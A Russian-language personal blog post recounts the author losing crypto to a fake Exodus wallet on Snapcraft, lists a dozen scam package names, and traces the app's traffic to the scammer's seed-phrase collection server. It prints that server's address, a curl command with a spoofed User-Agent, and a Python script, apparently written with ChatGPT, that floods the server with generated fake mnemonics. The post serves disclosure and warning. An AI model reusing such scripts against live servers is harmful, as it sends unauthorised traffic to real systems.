Эта история началась в далёком 2021 году, когда я на стихающей волне хайпа криптовалют решил купить немного биткоинов и эзериумов. Просто на всякий случай, чтобы были, вдруг их стоимость вырастет в 100 раз. Честно говоря, они так и пролежали большую часть времени в кошельке. Я сделал пару покупок просто, чтобы потратить их хоть на что‑то, например, оплатил хостинг у одного провайдера.

Не так давно я решил купить ещё один вечный сервак у этого провайдера. И здесь начинается ещё не сам квест, а предыстория к нему...

Акт 1. Неудачная покупка

Дело в том, что этот провайдер не получает перевод напрямую, а делает это через посредника Heleket. Причём за перевод берётся комиссия $25 с $500. А ещё платёж не проходит сразу, обычно требуется несколько минут на подтверждение транзакции. Но прошло уже несколько часов, а платёж всё не завершался, и я начал беспокоиться.

Написал в поддержку провайдера. Они ответили, что скорее всего возникли подозрения у AML и если происхождение денег окажется чистым(!!!), то платёж обязательно пройдёт, такие проблемы возникают только у 1% клиентов. Что значит чистым??? Я пополнил этот кошелёк один раз со своей зарплатной карты и после этого сделал пару покупок у этого же провайдера. Честно говоря, не очень приятно когда тебя подозревают в отмывании денег или какой‑то незаконной деятельности. Тем более, что для этого ноль оснований.

Написал в поддержку Heleket, где‑то через сутки они ответили, что им требуется подтверждение происхождения этих денежных средств. Серьёзно? На тот момент я даже не помнил сколько лет прошло с пополнения кошелька. Какое подтверждение я могу им отправить?

Переписка с ними длилась несколько дней, в итоге я каким‑то чудом нашёл в почте древнее письмо четырёхгодичной давности с информацией о том из какого банка делался перевод. И естественно после этого они отклонили платёж, промурыжив меня столько времени и не вернув $25 комиссии. Наверное вы уже догадались, что банк подсанкционный. Ой, хотя, стоп, в 2021 году ещё не было никаких санкций, но кого это волнует?

В итоге я так ничего и не купил у этого провайдера.

Акт 2. Жёсткий диск приказал долго жить

Наверняка, прочитав заголовок, вы решили, что вместе с жёстким диском похерился и кошелёк, но нет. Мне просто хочется поделиться этой рандомной историей, которая тем не менее тоже сыграла свою роль.

В ноутбуке просто лютейше начал шуметь вентилятор GPU. Когда менял его, то всё делал по фэн‑шую, отключил батарею, поменял кулер, подключил батарею, убедился, что всё работает. Закрутил крышку, снова включил и... увидел меню загрузчика Grub. Я долго чесал репу как прикручивание крышки ноутбука могло убить жёсткий диск. Попробовал подключить его как внешний накопитель через USB адаптер, сходил в сервис.

Мастер в сервисе сказал, что он впервые в жизни видит умерший Samsung EVO. В итоге оказалось, что диск всё‑таки подаёт признаки жизни. Хотя он и не определяется в BIOS, но Windows его видит и даже видит разделы. Только почему‑то список разделов загружается очень долго. Ну, и содержимое разделов естественно не видно, потому что там EXT4. В итоге мастер сказал, что на этом его полномочия всё, если бы вас красноглазых линуксоидов было чуть больше среди клиентов, то ему был бы смысл погружаться во всё это, а так, ты сам себе злобный буратино, вот и разбирайся. И я радостный тому, что диск всё‑таки работает пошёл разбираться.

Но радость моя была не долгой. В логах были просто пугающие записи. Братья линуксоиды оказали мне моральную поддержку сообщениями типа «Чел, твой жесткий диск сдох, покупай новый. И восстанавливай данные из бэкапа. У тебя же есть бэкап? Да? Да? Да?». Нет, бэкапа конечно же у меня не было, он для слабаков, которые боятся рисковать.

Я начал гуглить и открыл портал в ад в виде тонн обсуждений бракованных Samsung EVO. Возможно и мой жёсткий диск из этой же партии.

Но я не унывал и решил попросить помощи у надмозга ChatGPT. После нескольких очевидных советов он предложил выполнить ddrescue -d -r3 /dev/sda4 sda4.img sda4.log. И это сработало! Раздел скопировался, файл не был пустым. Я пробовал это и раньше, только без ключа -d, который отключает кэширование читаемых данных.

Более того раздел даже получилось примонтировать напрямую mount -o ro,loop,noload /dev/sda4 /mnt/disk. И это я тоже пробовал раньше, но только без параметра noload, который отключает загрузку журнала файловой системы.

Возможно, когда отключал батарею ноутбука, что‑то засбоило в диске или просто совпало. В любом случае, все важные данные я скопировал. И если вы скажете, что ИИ бессмысленная фигня, способная генерить только бред, то я с вами не соглашусь. Его советы оказались гораздо более дельными, чем у кожаных мешков на форуме.

Данные скопировал, но ОС решил установить с нуля, это проще и надёжнее.

Акт 3. Фейковый Exodus

Если у вас ОКР, то вы сразу поймёте, что может напрягать в этой картинке:

Долбаные Zoom и Exodus не могут сделать нормальные APT‑репозитории.

Наверное APT‑репозитории — это прошлый век, в них сложно публиковать пакеты, они тоталитарные и ограничивают свободу людей. Но всё‑таки есть светлый лучик демократии в виде Flathub и Snapcraft, где кто угодно может публиковать что угодно!

Я всегда с большой неохотой устанавливал оттуда пакеты. Ну, ок, раз я переустановил ОС, почему бы заодно и не избавиться от этих назойливых пунктов, к тому же и Canonicial так топит за Snapcraft. Это же не может быть что‑то плохое, подумал я и нашёл snap для Exodus:

Вообще ничего подозрительного. Это мой 1 голос, изначально их было 0 — ну, ок, наверное не слишком популярное приложение, подумал я. Дата публикации всего несколько дней назад — ну кто знает что это за дата, может это дата публикации последней версии. У автора пакета нет галочки — а откуда я знаю, что она там вообще должна быть? А в поле Confinement ещё написано Strict и значок щита для большей убедительности.

Да‑да‑да, этот Confinement означает совершенно другое. Но скам работает не так. Если бы каждый человек по минуте внимательно разглядывал каждый пункт, читал бы детальную документацию, изучал какие виды галочек бывают и где они отображаются, то у скамеров просто не было бы работы. Задним числом или со стороны всегда легко рассуждать: «ну, это же очевидно, как ты вообще дожил до своих лет»?

Короче, я установил это приложение, вписал код из 12 слов и... буквально через секунду понял, что это скам. Потому что приложение вместо баланса показало заглушку с нулями.

Стоп, чел, но разве Exodus не предупреждает, что нужно записать этот код из 12 слов на бумажке, съесть и никогда и нигде больше не писать? Да, его не нужно писать никогда кроме одного случая — когда вы устанавливаете и запускаете в первый раз приложение. Поэтому меня нисколько не удивило, что оно спросило код.

Дальше я стал судорожно искать как и куда перевести деньги с этого кошелька. Пока искал буквально через несколько минут увидел, что на счету ноль, а в истории транзакция на вывод. Как я уже писал в начале, на завершение транзакции требуется какое‑то время, но чтобы отменить её в процессе нужно сделать что‑то невероятное. А если она уже завершена, то вы можете только попросить получателя перевести вам деньги обратно. К сожалению, у меня это не получилось.

К слову, чел поднял неплохие деньги всего за несколько дней 0,9 BTC (порядка $90'000):

Акт 4. Стадия злости

Если стадию отрицания я прошёл буквально за мгновение, я сразу понял, что деньги не вернуть. То стадии злости и торга заняли чуть больше. Написал пост на Reddit, но его очень быстро заблокировали, кстати, как и фейковый Exodus. Но буквально на следующий день фейковый Exodus появился снова, у меня бомбануло и я написал ещё один пост примерно такого же содержания, что и первый, но на этот раз его почему‑то не стали блокировать.

Там я получил не только поддержку от пользователей Reddit типа «Чел, у меня сын в детском саду изучает основы общения со скамерами. Тебе точно нужно заняться повышением уровня своего образования!», но и немного мудрости «Не нужно устанавливать рандомные приложения и вводить в них секретные коды». Я искренне благодарен за эту полезную информацию!

К слову там же мне люди рассказали, что скам приложения в Snapcraft — это нормально. В этой свободе и есть его смысл, вы же не хотите возврата к цифровому APT‑концлагерю?

Ещё я написал пост в subreddit Exodus вообще без претензий, агрессии и так далее просто с предложением создать официальный APT‑репозиторий или Snap‑пакет. Тем более, что эта проблема существует годами. Тогда в 2024 году чел потерял $490'000. И ещё совсем недавно такое приложение снова блокировали. Естественно мой пост сразу заблокировали.

Казалось бы, что может быть проще? Создайте официальный пакет с красивой зеленой галочкой, множеством лайков, и фейковое приложение никто устанавливать не будет. Я написал об этом в поддержку Exodus и был абсолютно уверен в том, что они не создают официальный репозиторий, потому что они не знают, что это возможно или что у них пол разработчика в штате и нет ресурсов на это или что Linux для них не приоритетная платформа. Но всё оказалось ещё интереснее.

На сколько я понял, это их осознанная политика обеспечения безопасности. Это очень вольный пересказ: «В Snapcraft и Flathub пакеты распространяются с использованием собственных систем подписи и доверия и разработчик не может независимо проверять или управлять финальным релизом.» Иными словами, я понял это так, что даже если они опубликуют официальный snap‑пакет, то нет никакой гарантии, что до конечного пользователя дойдёт именно он.

«Плюс, даже если бы у них был официальный пакет, всё равно это не помешало бы другим публиковать фейковые приложения под похожими именами.»

«Что же касается официального APT‑репозитория, то это нормально работает для обычных приложений, например, для браузеров. Разработчики таких приложений получают полный доступ к пользовательским машинам на системном уровне. И если такой доступ получит браузер это норм, а если крипто‑кошелёк, то всё капец.» Честно говоря я вообще не понял этот пункт. Т.е. Exodus, установленный из deb‑пакета, скаченного с сайта, и Exodus, установленный из deb‑пакета, полученного из APT‑репозитория, имеют разные права доступа на пользовательских машинах? Или Exodus более критичное приложение, чем браузер, который имеет доступ ко всем моим паролям и банковским картам?

Лично я думаю, что Exodus просто не хочет запариваться с этим, брать на себя хоть какие‑то минимальные риски. А какие риски при этом для обычных пользователей, да им просто пофиг.

Акт 5. Мне это стало интересным

Это фейковое приложение ещё несколько раз появилось в Snapcraft, я отправил ещё несколько репортов, его снова заблокировали. Я периодически пытался найти не опубликовали ли его снова, но по запросу «exodus» больше ничего не находилось. А вчера вечером один пользователь Reddit написал, что он снова увидел это приложение, причём под названием «sensor». Он установил его, потому что ожидал, что это будет lm‑sensors.

И как тогда этот скам удалить, если он может называться как угодно? Короче я не нашёл простого способа найти копии этого приложения. Поэтому попросил ChatGPT написать скрипт, который скачивает в виде JSON информацию обо всех snap‑пакетах. Попросил написать ещё один скрипт, который парсит эти JSON в CSV файл.

Не буду приводить здесь эти скрипты, потому что они за несколько минут пишутся хоть с ИИ, хоть без. Но вообще прикольно, что у ChatGPT не возникло никаких сложностей с ними, это реально удобно.

Подождал несколько часов пока всё это скачается, а потом потратил ещё несколько секунд, чтобы найти 12 копий этого приложения с совершенно произвольными названиями.

assist-folder2
load
managerecordsync
monitorcheck
protect-hash-video624
release-transfer-db
safemake9
savenano
secure
sensor
smartreceiptmerge
text-kit-post

Не будут здесь писать по каким признакам я их нашёл, они просто очевидные. Не устанавливайте эти приложения и не вводите там свой код!

И кстати нашёл ещё несколько подозрительных пакетов. Но пока не устанавливал... Да, ну чёрт, с ним, я не могу удержаться, у меня просто мания устанавливать скам приложения и вводить там свои секретные коды. Я просто обязан установить snap‑пакет show1681. И похоже я не ошибся, это ещё один фейковый кошелек:

Жалко, что у меня нет этого кошелька с кучей денег, а то я бы и здесь ввёл свой код. Я нашёл 17 копий этого приложения под разными названиями.

И нашёл ещё 16 копий такого приложения. По названию окна видно, что чел сначала видимо просто тренировался в создании Exodus Wallet:

Дальше я решил посмотреть что внутри этого snap‑пакета и не нашел там особо ничего интересного. Затем с помощью Wireshark посмотрел какие запросы отправляются и нашёл запросы на адрес http://84.200.80.203:5052/endpoint//index.html Если его просто открыть в браузере, то ошибка 503. Но если указать User‑Agent, то запрос проходит нормально:

curl -H 'User-Agent: snapcraft2-exodus' http://84.200.80.203:5052/endpoint//index.html

Точнее сейчас уже нет. Пока я писал статью чел видимо немного перетруханул, что за ним выдвинулась бригада интерпола и отключил сервак.

К слову, сервер расположен в Германии и принадлежит компании Ultahost.

Кроме HTML‑файла, запрашивается ещё простенький JavaScript‑файл, в котором есть список допустимых слов. Как только вы их в водите ещё до нажатия кнопки отправляется запрос по адресу http://84.200.80.203:5052/collect

Естественно я попробовал отправить туда ещё какие‑нибудь коды. К сожалению у меня был только один код, поэтому пришлось придумывать фейковые. Но для них была ошибка 503. Хотел создать ещё несколько кошельков, закинуть туда пару‑тройку биткоинов и отправить коды от них. Но, что‑то меня в этом смутило, решил немного погуглить и узнал, что эти фразы из 12 слов формируются по стандарту BIP39. Попросил ChatGPT сгенерить мне такой скрипт:

#!/usr/bin/env python3

import os
from mnemonic import Mnemonic
import requests

USER_AGENT = "snapcraft2-exodus"
URL = "http://84.200.80.203:5052/collect"

mnemo = Mnemonic('english')

entropy = os.urandom(16)
mnemonic = mnemo.to_mnemonic(entropy)

headers = {
    'User-Agent': USER_AGENT,
    'Content-Type': 'application/json'
}
payload = {
    'name': 'exodus',
    'data': mnemonic.split()
}
print(f"Sending {mnemonic}... ", end="", flush=True)
try:
    response = requests.post(URL, headers=headers, json=payload)
    if response.ok:
        print("Ok")
    else:
        print(f"Failed with code {response.status_code}")
except requests.RequestException as e:
    print(f" Error: {e}")

И код успешно прошёл. Дальше я планировал заспамить фейковый Exodus фейковыми кодами. Но, блин, пока писал статью, чел уже слился и отключил сервак.

Короче я в сомнениях, прошёл я этот квест или нет... Если скамер отложил хотя бы пару кирпичей, когда посмотрел логи своего сервера, то наверное, да. Плюс он больше не получал переводов на свой кошелёк. Хотя, я думаю, что наверное у него всё будет хорошо, ну, опубликует ещё десяток‑другой копий своего приложения.

Итог

Это моё субъективное, ошибочное, очень вредное мнение, которое нужно немедленно удалить, покарать минусами и так далее, но

1. Для себя я решил что, крипта сама по себе — это скам. Вы меняете деньги на что‑то что вам не принадлежит. Нет никаких гарантий, что ваш платёж не заблокируют по какой угодно причине

2. Причём, если скамеры будут делать перевод с вашего кошелька, то будьте уверены, что этот платёж пройдёт за несколько минут, а не дней. А также будьте уверены, что эти деньги вы никогда не получите назад. В случае с банком есть хоть какие‑то шансы быстро заблокировать карту, а в случае с криптой вы будете просто наблюдать как транзакция обрабатывается

3. Со Snapcraft явно что‑то не так. Это конечно, круто что там опубликовано 7000 приложений, но как минимум 50 из них — это откровенный скам, который я сходу нашёл. Та же история со Flathub, там опубликован Exodus, который похож на реальный, но хз кем и хз что он реально делает

4. С Exodus в ещё большей степени что‑то не так. Если Canonicial хотя бы пытается что‑то делать. Как я понял, после прошлого инцидента на $490'000 они добавили галочки для разработчиков приложений. Но Exodus будто вообще нет дела до проблем их пользователей. Что для меня только подтверждает первый пункт из этого списка